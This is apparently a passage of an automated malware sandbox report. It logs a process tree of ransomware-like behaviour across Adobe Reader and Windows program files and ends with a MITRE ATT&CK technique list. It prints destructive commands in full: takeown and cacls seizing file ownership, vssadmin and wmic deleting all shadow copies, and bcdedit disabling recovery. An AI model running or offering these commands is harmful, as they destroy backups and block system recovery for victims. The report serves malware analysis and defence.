- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3968
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths""
  2⤵
  PID:3672
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths" /E /G Admin:F /C
    3⤵
    PID:2516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths"
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "can03.ths" -nobanner
    3⤵
    PID:1816
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "can03.ths" -nobanner
      4⤵
      PID:3640
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2656
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp""
  2⤵
  PID:984
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp" /E /G Admin:F /C
    3⤵
    PID:3896
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\SaslPrep\SaslPrepProfile_norm_bidi.spp"
    3⤵
    PID:3840
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
    3⤵
    PID:3692
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "SaslPrepProfile_norm_bidi.spp" -nobanner
      4⤵
      PID:3788
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3768
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT""
  2⤵
  PID:3612
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT" /E /G Admin:F /C
    3⤵
    PID:3596
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ROMAN.TXT"
    3⤵
    PID:3928
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "ROMAN.TXT" -nobanner
    3⤵
    PID:3892
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "ROMAN.TXT" -nobanner
      4⤵
      PID:836
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3704
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT""
  2⤵
  PID:3900
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT" /E /G Admin:F /C
    3⤵
    PID:3868
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\win\CP1257.TXT"
    3⤵
    PID:3876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "CP1257.TXT" -nobanner
    3⤵
    PID:3948
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "CP1257.TXT" -nobanner
      4⤵
      PID:2240
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2884
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der""
  2⤵
  PID:1628
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der" /E /G Admin:F /C
    3⤵
    PID:1688
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\RTC.der"
    3⤵
    - Modifies file permissions
    PID:2188
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "RTC.der" -nobanner
    3⤵
    PID:2688
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "RTC.der" -nobanner
      4⤵
      PID:2072
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2764
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif""
  2⤵
  PID:2620
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif" /E /G Admin:F /C
    3⤵
    PID:2712
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\end_review.gif"
    3⤵
    PID:2396
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "end_review.gif" -nobanner
    3⤵
    PID:1560
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "end_review.gif" -nobanner
      4⤵
      PID:2196
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2112
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif""
  2⤵
  PID:2452
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif" /E /G Admin:F /C
    3⤵
    PID:1728
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\reviews_joined.gif"
    3⤵
    PID:2832
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "reviews_joined.gif" -nobanner
    3⤵
    PID:4016
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "reviews_joined.gif" -nobanner
      4⤵
      PID:1928
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif""
  2⤵
  PID:4072
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif" /E /G Admin:F /C
    3⤵
    PID:1844
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\server_ok.gif"
    3⤵
    PID:3980
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "server_ok.gif" -nobanner
    3⤵
    PID:2704
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "server_ok.gif" -nobanner
      4⤵
      PID:3136
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:4044
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif""
  2⤵
  PID:2344
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif" /E /G Admin:F /C
    3⤵
    PID:484
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\warning.gif"
    3⤵
    - Modifies file permissions
    PID:3144
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "warning.gif" -nobanner
    3⤵
    PID:2800
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "warning.gif" -nobanner
      4⤵
      PID:3952
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:652
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf""
  2⤵
  PID:3164
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf" /E /G Admin:F /C
    3⤵
    PID:2080
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf"
    3⤵
    PID:4020
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
    3⤵
    PID:2392
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "MinionPro-BoldIt.otf" -nobanner
      4⤵
      PID:812
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2012
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB""
  2⤵
  PID:3000
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB" /E /G Admin:F /C
    3⤵
    PID:2924
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\SY______.PFB"
    3⤵
    - Modifies file permissions
    PID:3292
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "SY______.PFB" -nobanner
    3⤵
    PID:2608
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "SY______.PFB" -nobanner
      4⤵
      PID:1876
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2604
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp""
  2⤵
  PID:1500
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp" /E /G Admin:F /C
    3⤵
    PID:3180
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\brt.hyp"
    3⤵
    PID:3076
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "brt.hyp" -nobanner
    3⤵
    PID:1624
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "brt.hyp" -nobanner
      4⤵
      PID:3344
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:544
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx""
  2⤵
  PID:2128
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx" /E /G Admin:F /C
    3⤵
    PID:3468
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\eng32.clx"
    3⤵
    PID:3328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "eng32.clx" -nobanner
    3⤵
    PID:3324
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "eng32.clx" -nobanner
      4⤵
      PID:3364
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2988
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT""
  2⤵
  PID:3432
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT" /E /G Admin:F /C
    3⤵
    PID:900
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\CENTEURO.TXT"
    3⤵
    PID:1656
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "CENTEURO.TXT" -nobanner
    3⤵
    PID:3384
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "CENTEURO.TXT" -nobanner
      4⤵
      PID:3484
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3244
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT""
  2⤵
  PID:3352
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT" /E /G Admin:F /C
    3⤵
    PID:3516
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\UKRAINE.TXT"
    3⤵
    PID:3380
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "UKRAINE.TXT" -nobanner
    3⤵
    PID:3412
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "UKRAINE.TXT" -nobanner
      4⤵
      PID:3420
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2588
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui""
  2⤵
  PID:2740
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui" /E /G Admin:F /C
    3⤵
    PID:3416
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\en-US\msoeres.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3400
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "msoeres.dll.mui" -nobanner
    3⤵
    PID:2432
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "msoeres.dll.mui" -nobanner
      4⤵
      PID:3496
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3252
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files (x86)\Windows Mail\wab.exe""
  2⤵
  PID:1784
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Windows Mail\wab.exe" /E /G Admin:F /C
    3⤵
    PID:1724
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Windows Mail\wab.exe"
    3⤵
    PID:344
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "wab.exe" -nobanner
    3⤵
    PID:1764
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "wab.exe" -nobanner
      4⤵
      PID:2200
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2612
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui""
  2⤵
  PID:1964
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui" /E /G Admin:F /C
    3⤵
    PID:752
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\en-US\jnwdui.dll.mui"
    3⤵
    PID:2580
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "jnwdui.dll.mui" -nobanner
    3⤵
    PID:1168
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "jnwdui.dll.mui" -nobanner
      4⤵
      PID:2292
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1748
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui""
  2⤵
  PID:1768
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui" /E /G Admin:F /C
    3⤵
    PID:1072
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\es-ES\MSPVWCTL.DLL.mui"
    3⤵
    PID:2996
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
    3⤵
    PID:1996
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "MSPVWCTL.DLL.mui" -nobanner
      4⤵
      PID:2456
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2480
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\it-IT\JNTFiltr.dll.mui""
  2⤵
  PID:276
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\it-IT\JNTFiltr.dll.mui" /E /G Admin:F /C
    3⤵
    PID:1340
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\it-IT\JNTFiltr.dll.mui"
    3⤵
    PID:328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "JNTFiltr.dll.mui" -nobanner
    3⤵
    PID:2796
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "JNTFiltr.dll.mui" -nobanner
      4⤵
      PID:2512
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3752
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\ja-JP\Journal.exe.mui""
  2⤵
  PID:212
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\ja-JP\Journal.exe.mui" /E /G Admin:F /C
    3⤵
    PID:3044
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\ja-JP\Journal.exe.mui"
    3⤵
    PID:2876
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Journal.exe.mui" -nobanner
    3⤵
    PID:864
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Journal.exe.mui" -nobanner
      4⤵
      PID:236
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2776
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Journal\Templates\Graph.jtp""
  2⤵
  PID:2252
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Journal\Templates\Graph.jtp" /E /G Admin:F /C
    3⤵
    PID:220
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Journal\Templates\Graph.jtp"
    3⤵
    PID:2156
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "Graph.jtp" -nobanner
    3⤵
    PID:1588
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "Graph.jtp" -nobanner
      4⤵
      PID:1144
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:2464
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui""
  2⤵
  PID:3660
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui" /E /G Admin:F /C
    3⤵
    PID:2320
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\en-US\WinMail.exe.mui"
    3⤵
    - Modifies file permissions
    PID:3632
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
    3⤵
    PID:3640
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "WinMail.exe.mui" -nobanner
      4⤵
      PID:1816
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:1824
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Mail\wabmig.exe""
  2⤵
  PID:2332
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Mail\wabmig.exe" /E /G Admin:F /C
    3⤵
    PID:3840
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Mail\wabmig.exe"
    3⤵
    - Modifies file permissions
    PID:3848
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "wabmig.exe" -nobanner
    3⤵
    PID:3884
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "wabmig.exe" -nobanner
      4⤵
      PID:3808
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3692
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\YbhBhE16.bat" "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui""
  2⤵
  PID:3712
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui" /E /G Admin:F /C
    3⤵
    PID:2692
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files\Windows Photo Viewer\es-ES\PhotoViewer.dll.mui"
    3⤵
    - Modifies file permissions
    PID:3604
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c mVSen3Ss.exe -accepteula "PhotoViewer.dll.mui" -nobanner
    3⤵
    PID:3596
  - - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
      mVSen3Ss.exe -accepteula "PhotoViewer.dll.mui" -nobanner
      4⤵
      PID:3928
- - C:\Users\Admin\AppData\Local\Temp\mVSen3Ss.exe
    mVSen3Ss.exe -accepteula -c Run -y -p extract -nobanner
    3⤵
    PID:3720

C:\Windows\system32\taskeng.exe
taskeng.exe {2A290F58-CA99-400F-B2AD-041AC1540147} S-1-5-21-1658372521-4246568289-2509113762-1000:PIRBKNPS\Admin:Interactive:[1]
1⤵
PID:2308
- C:\Windows\SYSTEM32\cmd.exe
  C:\Windows\SYSTEM32\cmd.exe /c "C:\Users\Admin\AppData\Roaming\WUm6JQop.bat"
  2⤵
  PID:1100
- - C:\Windows\system32\vssadmin.exe
    vssadmin Delete Shadows /All /Quiet
    3⤵
    - Interacts with shadow copies
    PID:1772
- - C:\Windows\System32\Wbem\WMIC.exe
    wmic SHADOWCOPY DELETE
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:1824
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} recoveryenabled No
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3696
- - C:\Windows\system32\bcdedit.exe
    bcdedit /set {default} bootstatuspolicy ignoreallfailures
    3⤵
    - Modifies boot configuration data using bcdedit
    PID:3712
- - C:\Windows\system32\schtasks.exe
    SCHTASKS /Delete /TN DSHCA /F
    3⤵
    PID:3724

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "-131115021414460557096205703-1461359973-1091381121885756598-11372725152104564874"
1⤵
PID:1876

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:3168

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Peripheral Device Discovery

T1120

Query Registry

T1012

System Information Discovery

T1082

